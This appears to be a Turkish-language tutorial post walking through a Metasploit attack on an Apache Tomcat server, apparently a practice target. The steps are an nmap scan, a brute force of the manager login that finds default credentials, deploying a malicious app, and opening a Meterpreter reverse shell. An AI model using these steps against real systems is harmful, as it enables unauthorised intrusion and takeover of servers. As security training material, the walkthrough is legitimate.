Herkese merhaba,

Bu konuda, hedef bir sistemin, "Apache Tomcat" sunucusuna yönelik bir sızma testini nasıl gerçekleştirdiğimi anlatacağım.

"nmap -sV" komutu ile nmap ile portların servis ve version bilgilerini tarayalım.

8180. portta, "Apache Tomcat/Coyote JSP Engine 1.1" uygulaması çalışmakta, bizde bu uygulamaya yönelik,
métasploit içerisinde bulunan bir modül ile kaba kuvvet saldırısı uygulayacağız. Apache tomcat uygulamasının kullanıcı adı ve şifresini ele geçirip ardından yine métasploit içerisinde bulunan bir tomcat exploit ile hedef sisteme sızacağız ve meterpreter oturumu elde edeceğiz.
İlk önce "msfconsole" komutu ile métasploit framework’ ümüzü açalım.
Ardından, "use auxiliary/scanner/http/tomcat_mgr_login" modülüne girelim.

show options" komutu ile genel ayarları görelim.

Burada, "set RHOSTS" ve "set RPORT 8180" bilgilerini girdikten sonra "exploit" diyerek kaba kuvvet saldırısını gerçekleştiriyoruz.

Ve gördüğünüz gibi, "LOGİN SUCCESSFUL" yazısının yanında, "tomcat:tomcat" olarak kullanıcı adı ve şifre tespit edilmiş.
Artık bu bilgileride öğrendiğimize göre, sıra geldi exploit edip sisteme sızmaya.

"back" komutu ile bulunduğumuz auxiliary modülünden çıkıyoruz.

"use exploit/multi/http/tomcat_mgr_deploy" ile exploitimize giriyoruz.

"show options" ile genel ayarları yapıyoruz.

resimde gördüğünüz gibi gereken bilgileri girdikten sonra "exploit" komutunu çalıştırıyoruz.

Burada ekstradan payload seçmemize gerek yoktu. Çünkü, kendiliğinden "java/meterpreter/reverse_tcp" payload seçiliydi.

"exploit" komutunu verdikten sonra meterpreter oturumumuzu elde ediyoruz ve artık hedef sisteme sızmış bulunmaktayız.

Artık meterpreter komutları çalıştırabilirsiniz..

Shell açıp hedef sisteme girdik, artık ne istersek yapabiliriz

Bu eğitim konumunda sonuna geldim, okuduğunuz için teşekkür ederim .
